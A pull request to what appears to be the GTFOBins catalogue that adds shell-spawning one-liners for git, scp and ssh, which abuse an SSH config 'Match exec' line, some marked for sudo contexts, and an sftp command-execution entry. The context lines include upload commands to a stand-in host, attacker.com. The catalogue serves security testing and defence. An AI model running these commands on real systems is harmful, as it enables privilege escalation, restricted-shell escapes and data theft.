### PR TITLE
Included 4 new methods for shell or command execution

### DIFF
--- a/_gtfobins/git
+++ b/_gtfobins/git
@@ -66,4 +66,11 @@ functions:
           git --exec-path=. x -p
         shell: false
       unprivileged:
+  - code: |-
+      echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; GIT_SSH_COMMAND="ssh -F ~/.ssh/config" git clone user@host:repo.git
+    comment: |-
+      Spawns the shell on the client, doesn't have to be the official config file location
+    contexts:
+      sudo:
+      unprivileged:           
 ...

--- a/_gtfobins/scp
+++ b/_gtfobins/scp
@@ -25,6 +25,13 @@ functions:
       suid:
         shell: true
       unprivileged:
+  - code: |-
+      echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; scp -F ~/.ssh/config localhost:~/.ssh/config localhost
+    comment: |-
+      Spawns the shell on the client, doesn't have to be the official config file location
+    contexts:
+      sudo:
+      unprivileged:           
   upload:
   - code: |-
       scp /path/to/input-file user@attacker.com:/path/to/output-file

--- a/_gtfobins/sftp
+++ b/_gtfobins/sftp
@@ -29,4 +29,12 @@ functions:
       suid:
       unprivileged:
     receiver: ssh-server
+  command:
+  - code: |-
+      sftp -D /usr/bin/nautilus localhost
+    comment: |-
+      Executes the command provided you don't need to provide the whole path. 
+    contexts:
+      sudo:
+      unprivileged:        
 ...

--- a/_gtfobins/ssh
+++ b/_gtfobins/ssh
@@ -38,6 +38,13 @@ functions:
     contexts:
       sudo:
       unprivileged:
+  - code: |-
+      echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; ssh -F ~/.ssh/config localhost
+    comment: |-
+      Spawns the shell on the client, doesn't have to be the official config file location
+    contexts:
+      sudo:
+      unprivileged:       
   upload:
   - code: |-
       echo DATA | ssh user@attacker.com 'cat >/path/to/output-file"


### PR DESCRIPTION
With the following pull request I want to include four new additions to GTFO.

The binaries are already known in GTFO; however, the method is new. At this moment it has an impact on SSH, SFTP, SCP and Git.
For Git, SSH and SCP we are able to spawn a shell by making use of the SSH config. Specifically making use of the **Match exec** functionality. For SFTP we found a new method to perform command execution.

If there are any questions, please feel free to ask.

Kind regards,
IgnifexLabs